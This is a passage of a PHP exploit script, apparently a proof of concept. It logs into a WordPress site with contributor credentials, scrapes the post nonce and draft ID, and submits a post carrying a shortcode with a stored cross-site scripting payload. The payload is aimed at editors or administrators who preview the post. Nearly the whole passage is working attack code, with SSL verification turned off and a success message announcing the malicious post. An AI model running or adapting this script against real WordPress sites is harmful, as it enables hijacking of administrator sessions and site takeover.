curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// A successful login follows the redirect to the dashboard
if ($response === false || (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false)) {
    die('Authentication failed. Check credentials.' . PHP_EOL);
}

// Step 2: Load the new-post form. WordPress creates an auto-draft and renders
// its ID and an update-post nonce as hidden fields; post.php requires both.
// This assumes the classic editor form (post-new.php); the block editor
// submits through the REST API with an X-WP-Nonce header instead.
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);

if (!preg_match('/name=["\']_wpnonce["\']\s+value=["\']([^"\']+)["\']/', $response, $nonce_match)) {
    die('Could not find _wpnonce in post-new.php; is the classic editor form active?' . PHP_EOL);
}
if (!preg_match('/name=["\']post_ID["\']\s+value=["\'](\d+)["\']/', $response, $id_match)) {
    die('Could not find the auto-draft post_ID in post-new.php.' . PHP_EOL);
}
$nonce = $nonce_match[1];
$post_id = $id_match[1];

// Step 3: Submit the post with the malicious shortcode. A Contributor cannot
// publish, so WordPress stores the post as 'pending'; the shortcode renders
// when an Editor or Administrator previews or publishes it.
$create_post_url = $target_url . '/wp-admin/post.php';
$post_data = array(
    'post_ID' => $post_id,
    'post_title' => $post_title,
    'content' => $post_content,
    'publish' => 'Publish',
    'post_type' => 'post',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '/wp-admin/post-new.php',
    'action' => 'editpost',
    'post_status' => 'publish'
);

curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Step 4: Verify the post was stored (published, updated, or submitted for review)
if ($response !== false && preg_match('/Post (published|updated|submitted)/', $response)) {
    echo 'SUCCESS: Malicious post stored with XSS payload in placeholder_img parameter.' . PHP_EOL;
    echo 'The shortcode ' . $malicious_shortcode . ' will render unescaped when the post is viewed.' . PHP_EOL;
} else {
    echo 'Post creation may have failed. Check permissions and nonce.' . PHP_EOL;
}

curl_close($ch);
unlink($cookie_jar);
?>
